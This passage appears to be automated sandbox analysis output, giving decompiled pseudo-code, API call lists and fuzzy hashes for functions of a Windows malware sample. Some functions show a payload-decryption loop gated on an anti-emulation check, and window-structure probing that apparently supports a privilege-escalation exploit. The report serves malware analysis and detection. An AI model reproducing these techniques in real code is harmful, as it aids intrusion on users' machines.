                      									_t103 =  *0x944248; // 0x1388
                      									 *0x9580d8 = CreateWindowExW(0x80000, L"MyMainWnd", 0, 0x10000000, _t103 + 1, _t101 + 1, 1, 1, 0, 0,  *0x9580b8, 0);
                      									if( *0x9580d8 != 0) {
                      										asm("adc edi, 0x0");
                      										asm("adc edi, 0x0");
                      										asm("adc edi, 0xffffffff");
                      										SetWindowLongW( *0x9580d8, 0xfffffff0, GetWindowLongW( *0x9580d8, 0xfffffff0) | 0x40000000);
                      										_push( *0x95808c);
                      										_push( *0x958088 +  *0x958064 + 3 - 0x28);
                      										_push(0xfffffff4);
                      										_push( *0x9580d8);
                      										_push( *0x9441ec);
                      										L009310C5();
                      										keybd_event(0x12, 0, 0, 0);
                      										keybd_event(0x1b, 0, 0, 0);
                      										keybd_event(0x1b, 0, 2, 0);
                      										keybd_event(0x12, 0, 2, 0);
                      										Sleep(0x64);
                      									}
                      									DestroyWindow( *0x9580d4);
                      									DestroyWindow( *0x9580d8);
                      									TerminateThread( *0x9580c0, 0xffffffff);
                      									WaitForSingleObject( *0x9580c0, 0xffffffff);
                      									if( *0x95807c == 0 &&  *((intOrPtr*)( *0x958084 +  *0x958064)) >= 0x4000000) {
                      										 *0x95807c = E0093C820();
                      									}
                      								}
                      								goto L50;
                      							}
                      							goto L51;
                      						}
                      					}
                      				}
                      				_t177 =  *(_t185 - 0xbfc);
                      				goto L8;
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$ClassCreateDestroyRegister_memset
                      • String ID: 0$MyExtraWnd
                      • API String ID: 1202089904-2557349926
                      • Opcode ID: 55d13bfbd1b3ce77648fd224a4d08d56906817319b1023e615bc7aa8d9573179
                      • Instruction ID: a8a16464dd274189160ad2c12ede99c90be7cc85da6ea8b386bb9168aa5734fa
                      • Opcode Fuzzy Hash: 55d13bfbd1b3ce77648fd224a4d08d56906817319b1023e615bc7aa8d9573179
                      • Instruction Fuzzy Hash: F95170B4D153298BEB20CF68EC54BEEB7B8BB49304F1442E5E419A7290DB745E85CF41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E00931CAC(void* __ebx, void* __edi, void* __eflags) {
                      				void* __esi;
                      				void* _t3;
                      				intOrPtr _t6;
                      				long _t14;
                      				long* _t27;
                      
                      				E00931E5B(_t3);
                      				if(E009334FF() != 0) {
                      					_t6 = E00933010(E00931A3D);
                      					 *0x943000 = _t6;
                      					__eflags = _t6 - 0xffffffff;
                      					if(_t6 == 0xffffffff) {
                      						goto L1;
                      					} else {
                      						_t27 = E00933585(1, 0x3bc);
                      						__eflags = _t27;
                      						if(_t27 == 0) {
                      							L6:
                      							E00931D22();
                      							__eflags = 0;
                      							return 0;
                      						} else {
                      							__eflags = E0093306C( *0x943000, _t27);
                      							if(__eflags == 0) {
                      								goto L6;
                      							} else {
                      								_push(0);
                      								_push(_t27);
                      								E00931BF9(__ebx, __edi, _t27, __eflags);
                      								_t14 = GetCurrentThreadId();
                      								_t27[1] = _t27[1] | 0xffffffff;
                      								 *_t27 = _t14;
                      								__eflags = 1;
                      								return 1;
                      							}
                      						}
                      					}
                      				} else {
                      					L1:
                      					E00931D22();
                      					return 0;
                      				}
                      			}

                      APIs
                      • __init_pointers.LIBCMT ref: 00931CAC
                        • Part of subcall function 00931E5B: RtlEncodePointer.NTDLL(00000000,?,00931CB1,00931509,00941E70,00000014), ref: 00931E5E
                        • Part of subcall function 00931E5B: __initp_misc_winsig.LIBCMT ref: 00931E79
                        • Part of subcall function 00931E5B: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00933103
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00933117
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0093312A
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0093313D
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00933150
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00933163
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00933176
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00933189
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0093319C
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 009331AF
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 009331C2
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 009331D5
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 009331E8
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 009331FB
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0093320E
                        • Part of subcall function 00931E5B: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00933221
                      • __mtinitlocks.LIBCMT ref: 00931CB1
                      • __mtterm.LIBCMT ref: 00931CBA
                        • Part of subcall function 00931D22: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00931CBF,00931509,00941E70,00000014), ref: 00933419
                        • Part of subcall function 00931D22: _free.LIBCMT ref: 00933420
                        • Part of subcall function 00931D22: DeleteCriticalSection.KERNEL32(00943068,?,?,00931CBF,00931509,00941E70,00000014), ref: 00933442
                      • __calloc_crt.LIBCMT ref: 00931CDF
                      • __initptd.LIBCMT ref: 00931D01
                      • GetCurrentThreadId.KERNEL32 ref: 00931D08
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                      • String ID:
                      • API String ID: 3567560977-0
                      • Opcode ID: 948851e8e09014f6185ba5913ffc412b540aa849da5d95d2e66fb29414563a86
                      • Instruction ID: 479f583cc49e48c8524163ef838867f323fdbd6ff3df8c80b077eba20de54e58
                      • Opcode Fuzzy Hash: 948851e8e09014f6185ba5913ffc412b540aa849da5d95d2e66fb29414563a86
                      • Instruction Fuzzy Hash: A0F0B43659971119E2387B747C03B5B2A99DF82734F208B29F4A5C50F2FF11C9425D94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0093BFE0(struct HWND__* _a4) {
                      				int _v8;
                      				void _v12;
                      				struct HWND__* _t12;
                      				int _t16;
                      				int _t18;
                      				int _t22;
                      				struct HWND__* _t24;
                      
                      				_t12 = GetForegroundWindow();
                      				_t24 = _a4;
                      				if(_t12 == _t24) {
                      					return _t12;
                      				}
                      				_t22 = 0;
                      				_v12 = 8;
                      				_v8 = 0;
                      				if(SystemParametersInfoW(0x48, 8,  &_v12, 0) != 0) {
                      					_t18 = _v8;
                      					if(_t18 != 0) {
                      						_t22 = _t18;
                      						_v12 = 8;
                      						_v8 = 0;
                      						SystemParametersInfoW(0x49, 8,  &_v12, 0);
                      					}
                      				}
                      				SendMessageW(_t24, 0x112, 0xf020, 0);
                      				_t16 = SendMessageW(_t24, 0x112, 0xf120, 0);
                      				if(_t22 != 0) {
                      					_v12 = 8;
                      					_v8 = _t22;
                      					_t16 = SystemParametersInfoW(0x49, 8,  &_v12, 0);
                      				}
                      				return _t16;
                      			}

                      APIs
                      • GetForegroundWindow.USER32(?,?), ref: 0093BFE7
                      • SystemParametersInfoW.USER32 ref: 0093C015
                      • SystemParametersInfoW.USER32 ref: 0093C03C
                      • SendMessageW.USER32(?,00000112,0000F020,00000000), ref: 0093C051
                      • SendMessageW.USER32(?,00000112,0000F120,00000000), ref: 0093C060
                      • SystemParametersInfoW.USER32 ref: 0093C07A
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoParametersSystem$MessageSend$ForegroundWindow
                      • String ID:
                      • API String ID: 4248574875-0
                      • Opcode ID: 26eeccbaf94b40852a01f4c25d5f8411bf12e7961c7243a60660232832bbd64c
                      • Instruction ID: 5ff825a6173eb9df330bb2eba84eab8f2420f4487644ff256396f74c873512fb
                      • Opcode Fuzzy Hash: 26eeccbaf94b40852a01f4c25d5f8411bf12e7961c7243a60660232832bbd64c
                      • Instruction Fuzzy Hash: 0D1133B0A84308BAFB208B949D86FAE7BBCEB04B55F504165FA44BA1C0C7F46D459B50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0093CFD0() {
                      				struct HWND__* _t10;
                      				void* _t12;
                      				int _t15;
                      
                      				_t15 = 0;
                      				_t10 = CreateWindowExW(0, 0x8002, 0, 0, 0, 0, 0, 0, 0, 0,  *0x9580b8, 0);
                      				if(_t10 == 0) {
                      					L8:
                      					return _t15;
                      				} else {
                      					_t12 = E0093C750(_t10);
                      					if(_t12 == 0) {
                      						L7:
                      						DestroyWindow(_t10);
                      						goto L8;
                      					} else {
                      						SetWindowLongW(_t10, 0, 0x31323334);
                      						while( *((intOrPtr*)(_t15 + _t12)) != 0x31323334) {
                      							_t15 = _t15 + 1;
                      							if(_t15 < 0x200) {
                      								continue;
                      							} else {
                      								DestroyWindow(_t10);
                      								return 0;
                      							}
                      							goto L9;
                      						}
                      						_t15 = _t15 + 8;
                      						goto L7;
                      					}
                      				}
                      				L9:
                      			}


                      APIs
                      • CreateWindowExW.USER32 ref: 0093CFE9
                      • SetWindowLongW.USER32 ref: 0093D009
                      • DestroyWindow.USER32(00000000,?,00000000), ref: 0093D025
                      • DestroyWindow.USER32(00000000,00000000,74656490,?,00000000), ref: 0093D035
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$Destroy$CreateLong
                      • String ID: 4321
                      • API String ID: 4054532065-3297689448
                      • Opcode ID: c9523dda6824ec4036d905db8e5026e28b1662a4f388ada07bfa10bdfa5b0510
                      • Instruction ID: 9685d5de4d4e4132c2bf126e5d584d83868639af6b25417432d5c34b13e166cf
                      • Opcode Fuzzy Hash: c9523dda6824ec4036d905db8e5026e28b1662a4f388ada07bfa10bdfa5b0510
                      • Instruction Fuzzy Hash: 55F05B7231662167D23517AAAC8CD9BDA5DDF567A3B054021F905E1251CB308C025FE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0093BF60() {
                      				struct HWND__* _t10;
                      				void* _t12;
                      				int _t15;
                      
                      				_t15 = 0;
                      				_t10 = CreateWindowExW(0, 0x8002, 0, 0, 0, 0, 0, 0, 0, 0,  *0x958030, 0);
                      				if(_t10 == 0) {
                      					L8:
                      					return _t15;
                      				} else {
                      					_t12 = E0093C750(_t10);
                      					if(_t12 == 0) {
                      						L7:
                      						DestroyWindow(_t10);
                      						goto L8;
                      					} else {
                      						SetWindowLongW(_t10, 0, 0x31323334);
                      						while( *((intOrPtr*)(_t15 + _t12)) != 0x31323334) {
                      							_t15 = _t15 + 1;
                      							if(_t15 < 0x200) {
                      								continue;
                      							} else {
                      								DestroyWindow(_t10);
                      								return 0;
                      							}
                      							goto L9;
                      						}
                      						_t15 = _t15 + 4;
                      						goto L7;
                      					}
                      				}
                      				L9:
                      			}


                      APIs
                      • CreateWindowExW.USER32 ref: 0093BF79
                      • SetWindowLongW.USER32 ref: 0093BF99
                      • DestroyWindow.USER32(00000000,?,00000000), ref: 0093BFB5
                      • DestroyWindow.USER32(00000000,00000000,74656490,?,00000000), ref: 0093BFC5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$Destroy$CreateLong
                      • String ID: 4321
                      • API String ID: 4054532065-3297689448
                      • Opcode ID: 501c5ef72cdc9f28aeeefc847888f7c0ba00744af8b09e04fd834b467cfeaa1e
                      • Instruction ID: 104ddfbc842b4b4f08db8cb62b6dba84d87dba21ff4fcb06be4157ccd85ded0a
                      • Opcode Fuzzy Hash: 501c5ef72cdc9f28aeeefc847888f7c0ba00744af8b09e04fd834b467cfeaa1e
                      • Instruction Fuzzy Hash: AEF0807631963167D22137E9DC8CD97DA5CDF467B67055035F605E1251CB308C415FE1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 68%
                      			E009313F5() {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _t18;
                      				void* _t23;
                      				void* _t24;
                      				signed int _t25;
                      				long _t27;
                      				void* _t28;
                      				void* _t30;
                      
                      				E0093132F(_t28);
                      				_t18 = 0x13;
                      				_v48 = 2;
                      				_v44 = 1;
                      				_v40 = 0x23;
                      				_v36 = 3;
                      				_v32 = 0xd;
                      				_v28 = _t18;
                      				_v24 = 0x14;
                      				_v20 = 0xa;
                      				_v16 = 0xb;
                      				_v12 = _t18;
                      				_v8 = 0xf;
                      				OpenProcess(0, 0, 0);
                      				if(GetLastError() == 0x57) {
                      					_t25 = 0;
                      					_t27 = 0;
                      					do {
                      						 *(_t27 + 0x944250) =  *(_t27 + 0x944250) ^  *(_t30 + _t25 * 4 - 0x2c);
                      						_t25 =  ==  ? 0 : _t25 + 1;
                      						_t27 = _t27 + 1;
                      						_t33 = _t27 - 0x13000;
                      					} while (_t27 < 0x13000);
                      					_t23 = E00931243(_t24, _t25, _t28, 0, _t33);
                      					_push(0);
                      					if(_t23 != 0) {
                      						L2:
                      						ExitProcess();
                      					}
                      					ExitThread();
                      				}
                      				_push(0);
                      				goto L2;
                      			}


                      APIs
                        • Part of subcall function 0093132F: GetModuleFileNameW.KERNEL32(00000000,?,00000100), ref: 00931359
                        • Part of subcall function 0093132F: GetModuleFileNameW.KERNEL32(00000000,?,00000100), ref: 0093136C
                        • Part of subcall function 0093132F: GetLastError.KERNEL32 ref: 00931374
                        • Part of subcall function 0093132F: CharUpperBuffW.USER32(?,00000000), ref: 00931387
                        • Part of subcall function 0093132F: GetCurrentProcess.KERNEL32(00000000), ref: 009313AD
                        • Part of subcall function 0093132F: IsWow64Process.KERNEL32(00000000), ref: 009313B4
                        • Part of subcall function 0093132F: GetCurrentProcessId.KERNEL32 ref: 009313C7
                      • OpenProcess.KERNEL32(00000000,00000000,00000000), ref: 0093144E
                      • GetLastError.KERNEL32 ref: 00931454
                      • ExitProcess.KERNEL32(00000000), ref: 00931460
                      • ExitThread.KERNEL32 ref: 00931490
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$CurrentErrorExitFileLastModuleName$BuffCharOpenThreadUpperWow64
                      • String ID: #
                      • API String ID: 3640460183-1885708031
                      • Opcode ID: c6ea82885ba5abf75d42bb62294400830deed16d71b6c5c775dfeb654af86cd7
                      • Instruction ID: 9d6dd05eb8b0ac12dc19085dc4d6a8faffdd4b470046f78cfa7f13a3dc7c5282
                      • Opcode Fuzzy Hash: c6ea82885ba5abf75d42bb62294400830deed16d71b6c5c775dfeb654af86cd7
                      • Instruction Fuzzy Hash: 53018470D152199BDB18AFB4C85C7DEBEF9EF09348F108018D015A62A1D7F80A459FF5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 16%
                      			E00931D3F(void* __ecx, intOrPtr _a4) {
                      				struct HINSTANCE__* _v8;
                      				_Unknown_base(*)()* _t4;
                      
                      				_t4 =  &_v8;
                      				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
                      				if(_t4 != 0) {
                      					_t4 = GetProcAddress(_v8, "CorExitProcess");
                      					if(_t4 != 0) {
                      						return  *_t4(_a4);
                      					}
                      				}
                      				return _t4;
                      			}


                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00931D7E,00000000,?,00935078,000000FF,0000001E,00000000,00000000,00000000,?,009335E3), ref: 00931D4E
                      • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00931D60
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressHandleModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 1646373207-1276376045
                      • Opcode ID: 44ab9e2a770259f885d5d1ba07299ec75ae8dc166384c1e9d1f890085b828239
                      • Instruction ID: 20a8248edca4e7a123b2ade2d2f399b89cc0b1100c10952cd5fa5eec53e7149f
                      • Opcode Fuzzy Hash: 44ab9e2a770259f885d5d1ba07299ec75ae8dc166384c1e9d1f890085b828239
                      • Instruction Fuzzy Hash: 38D01230648208BBDB145BA1DC05F6A776DAB45741F040154B824D50E0DBA19A10AE64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E009375CA(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                      				char _v8;
                      				intOrPtr _v12;
                      				int _v20;
                      				int _t35;
                      				int _t38;
                      				intOrPtr* _t44;
                      				int _t47;
                      				short* _t49;
                      				intOrPtr _t50;
                      				intOrPtr _t54;
                      				int _t55;
                      				int _t59;
                      				char* _t62;
                      
                      				_t62 = _a8;
                      				if(_t62 == 0) {
                      					L5:
                      					return 0;
                      				}
                      				_t50 = _a12;
                      				if(_t50 == 0) {
                      					goto L5;
                      				}
                      				if( *_t62 != 0) {
                      					E009339D6( &_v20, _a16);
                      					_t35 = _v20;
                      					__eflags =  *(_t35 + 0xa8);
                      					if( *(_t35 + 0xa8) != 0) {
                      						_t38 = E0093750C( *_t62 & 0x000000ff,  &_v20);
                      						__eflags = _t38;
                      						if(_t38 == 0) {
                      							__eflags = _a4;
                      							_t59 = 1;
                      							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                      							if(__eflags != 0) {
                      								L21:
                      								__eflags = _v8;
                      								if(_v8 != 0) {
                      									_t54 = _v12;
                      									_t31 = _t54 + 0x70;
                      									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                      									__eflags =  *_t31;
                      								}
                      								return _t59;
                      							}
                      							L20:
                      							_t44 = E009342FC(__eflags);
                      							_t59 = _t59 | 0xffffffff;
                      							__eflags = _t59;
                      							 *_t44 = 0x2a;
                      							goto L21;
                      						}
                      						_t59 = _v20;
                      						__eflags =  *(_t59 + 0x74) - 1;
                      						if( *(_t59 + 0x74) <= 1) {
                      							L15:
                      							__eflags = _t50 -  *(_t59 + 0x74);
                      							L16:
                      							if(__eflags < 0) {
                      								goto L20;
                      							}
                      							__eflags = _t62[1];
                      							if(__eflags == 0) {
                      								goto L20;
                      							}
                      							L18:
                      							_t59 =  *(_t59 + 0x74);
                      							goto L21;
                      						}
                      						__eflags = _t50 -  *(_t59 + 0x74);
                      						if(__eflags < 0) {
                      							goto L16;
                      						}
                      						__eflags = _a4;
                      						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                      						_t59 = _v20;
                      						__eflags = _t47;
                      						if(_t47 != 0) {
                      							goto L18;
                      						}
                      						goto L15;
                      					}
                      					_t55 = _a4;
                      					__eflags = _t55;
                      					if(_t55 != 0) {
                      						 *_t55 =  *_t62 & 0x000000ff;
                      					}
                      					_t59 = 1;
                      					goto L21;
                      				}
                      				_t49 = _a4;
                      				if(_t49 != 0) {
                      					 *_t49 = 0;
                      				}
                      				goto L5;
                      			}


                      APIs
                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00937600
                      • __isleadbyte_l.LIBCMT ref: 0093762E
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 0093765C
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 00937692
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                      • String ID:
                      • API String ID: 3058430110-0
                      • Opcode ID: 245aa966855fd1f77c9d3ce5c533a57f92e62060ba6824a13a787ee26a24073e
                      • Instruction ID: 31df534d44fefe3d535cfbe4b84337c4610c9ad1b35dc4e5f85ff8a3ccbd42d0
                      • Opcode Fuzzy Hash: 245aa966855fd1f77c9d3ce5c533a57f92e62060ba6824a13a787ee26a24073e
                      • Instruction Fuzzy Hash: 6F31CFB0608646EFDB358EA9CC56BAABBA9FF41314F154929F814871A0E730D850DF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E009350DD(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                      				void* _t7;
                      				long _t8;
                      				intOrPtr* _t9;
                      				intOrPtr* _t12;
                      				long _t20;
                      				long _t31;
                      
                      				if(_a4 != 0) {
                      					_t31 = _a8;
                      					__eflags = _t31;
                      					if(_t31 != 0) {
                      						_push(__ebx);
                      						while(1) {
                      							__eflags = _t31 - 0xffffffe0;
                      							if(_t31 > 0xffffffe0) {
                      								break;
                      							}
                      							__eflags = _t31;
                      							if(_t31 == 0) {
                      								_t31 = _t31 + 1;
                      								__eflags = _t31;
                      							}
                      							_t7 = HeapReAlloc( *0x95729c, 0, _a4, _t31);
                      							_t20 = _t7;
                      							__eflags = _t20;
                      							if(_t20 != 0) {
                      								L17:
                      								_t8 = _t20;
                      							} else {
                      								__eflags =  *0x957fd0 - _t7;
                      								if(__eflags == 0) {
                      									_t9 = E009342FC(__eflags);
                      									 *_t9 = E0093430F(GetLastError());
                      									goto L17;
                      								} else {
                      									__eflags = E009345F0(_t7, _t31);
                      									if(__eflags == 0) {
                      										_t12 = E009342FC(__eflags);
                      										 *_t12 = E0093430F(GetLastError());
                      										L12:
                      										_t8 = 0;
                      										__eflags = 0;
                      									} else {
                      										continue;
                      									}
                      								}
                      							}
                      							goto L14;
                      						}
                      						E009345F0(_t6, _t31);
                      						 *((intOrPtr*)(E009342FC(__eflags))) = 0xc;
                      						goto L12;
                      					} else {
                      						E0093354D(_a4);
                      						_t8 = 0;
                      					}
                      					L14:
                      					return _t8;
                      				} else {
                      					return E0093504B(__ebx, __edx, __edi, _a8);
                      				}
                      			}
